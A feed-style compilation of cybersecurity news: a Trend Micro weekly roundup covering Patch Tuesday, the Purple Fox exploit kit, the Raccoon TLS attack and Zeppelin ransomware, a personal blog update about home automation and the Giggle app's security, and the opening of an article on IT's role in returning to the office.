Microsoft released patches for 129 CVEs (common vulnerabilities and exposures) as part of its monthly Patch Tuesday rollout. Dustin Childs from Trend Micro’s Zero Day Initiative shared that this marks seven consecutive months of more than 110 bugs fixed and brings the yearly total close to 1,000.

Purple Fox EK Relies on Cloudflare for Stability

A year ago, Trend Micro talked about Purple Fox malware being delivered by the Rig exploit kit. Malwarebytes later found evidence that it had its own delivery mechanism, and thus named it the Purple Fox exploit kit. Trend Micro recently found a spike in the Purple Fox exploit kit with improved delivering tactics in our telemetry. Some of the improvements include use of full HTTPS infrastructure based on Cloudflare as frontend, fully encrypted landing page, and disguised redirection.

New Raccoon Attack Could Let Attackers Break SSL/TLS Encryption

A group of researchers has detailed a new timing vulnerability in Transport Layer Security (TLS) protocol that could potentially allow an attacker to break the encryption and read sensitive communication under specific conditions. Dubbed “Raccoon Attack,” the server-side attack exploits a side-channel in the cryptographic protocol (versions 1.2 and lower) to extract the shared secret key used for secure communications between two parties.

War of Linux Cryptocurrency Miners: A Battle for Resources

The Linux ecosystem is regarded as more secure and reliable than other operating systems, which possibly explains why Google, NASA, and the US Department of Defense (DoD) utilize it for their online infrastructures and systems. Unfortunately, the adoption of Linux systems is also an attractive target for cybercriminals. In this blog, learn about the ruthless battle for computing power among the different cryptocurrency-mining malware that target Linux systems. 

Trend Micro’s XDR Offerings Simplify and Optimize Detection and Response

Trend Micro announced Worry-Free XDR is a new version of its XDR platform designed to extend the power of correlated detection and response beyond the endpoint for smaller businesses. This unmatched channel offering is available now as a standalone or managed solution tailored for SMBs.

Securing Enterprise Security: How to Manage the New Generation of Access Control Devices

Enterprises are increasingly deploying contactless security solutions to control access to their spaces, especially now in the midst of a pandemic. These solutions mostly rely on devices that use facial recognition to manage entry to enterprise premises in an effective and efficient manner. Considering that these access control devices are the first line of defense for employees and assets on enterprise premises, Trend Micro set out to test the security of the devices and to find out whether they are susceptible to cyber as well as physical attacks.

Zeppelin Ransomware Returns with New Trojan on Board

The Zeppelin ransomware has sailed back into relevance, after a hiatus of several months. A wave of attacks were spotted in August by Juniper Threatlab researchers, making use of a new trojan downloader. These, like an initial Zeppelin wave observed in late 2019, start with phishing emails with Microsoft Word attachments (themed as “invoices”) that have malicious macros on board. Once a user enables macros, the infection process starts.

Published New Ebook: Strategic Investment to Secure Smart Factories

Security is undergoing a digital transformation in the manufacturing industry. As the fusion of the cyber world and the physical world progresses, various security issues are mounting. Manufacturing executives must view security as a management issue, not as a system issue. Trend Micro has published an ebook that focuses on security issues in the convergence of IT and OT.

Ransomware Accounted for 41% of All Cyber Insurance Claims in H1 2020

Ransomware incidents have accounted for 41% of cyber insurance claims filed in the first half of 2020, according to a report published today by Coalition, one of the largest providers of cyber insurance services in North America. The high number of claims comes to confirm previous reports from multiple cybersecurity firms that ransomware is one of today’s most prevalent and destructive threats.

What do you think about the Zeppelin ransomware attacks and the rise in ransomware overall? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: @JonLClay.

The post This Week in Security News: Microsoft Fixes 129 Vulnerabilities for September’s Patch Tuesday and Trend Micro’s XDR Offerings Simplify and Optimize Detection and Response appeared first on .

Weekly Update 208

Weekly Update 208

The highlight of my week was absolutely getting the Shelly 1 units behind a couple of my light switches working as I'd always dreamed. It just opens up so many automation possibilities that I'm really excited about what I might do in the future with them now. When I get the place to a standard I'm happy with, I'll definitely do a good walkthrough and show how it all works. Until then, this week's update has some general infosec stuff but chief amongst that is the Giggle app situation. So many layers on this one, so many layers...

Weekly Update 208
Weekly Update 208
Weekly Update 208
Weekly Update 208

References

  1. Got the Shelly 1 working absolutely perfectly! (this is precisely what I always envisaged)
  2. Don't say your app is "highly secure" while the browser is literally telling everyone it's "Not Secure" (it's now fixed but still, how do you even start out without HTTPS these days?!)
  3. So apparently Michael McIntyre needed some good new material 🤣 (honestly, I couldn't care less if he actually did, that'd be kinda cool)
  4. If you want to go down a rabbit hole, read my short thread on the Giggle security situation then delve into the tweet threads 😲 (security is one thing, debates on AI detecting females and what makes someone one is quite another)
  5. Sponsored by: The biggest return on security investment is getting your time back. Scale your defenses and regain control with Tines Security Automation.

Returning to the workplace: IT’s role

When the pandemic hit the U.S. with a vengeance, most companies made on-the-fly decisions to shut down the workplace, forcing employees to make the switch to work from home with little to no warning. Ensuring that everyone had the right equipment and the ability to connect to the corporate networks – and do so securely – in a matter of hours was a challenge for IT and security teams. It was, safe to say, a situation no CIO or CISO wants to repeat. 

Now some companies are bringing employees back to the worksite. This, thankfully, can be done methodically and with careful planning, yielding a worksite that is not going to look like the one the employee left back in March. But it isn’t just preparing offices for the staff’s return; IT and security teams have to be prepared for three different workforce scenarios:

To read this article in full, please click here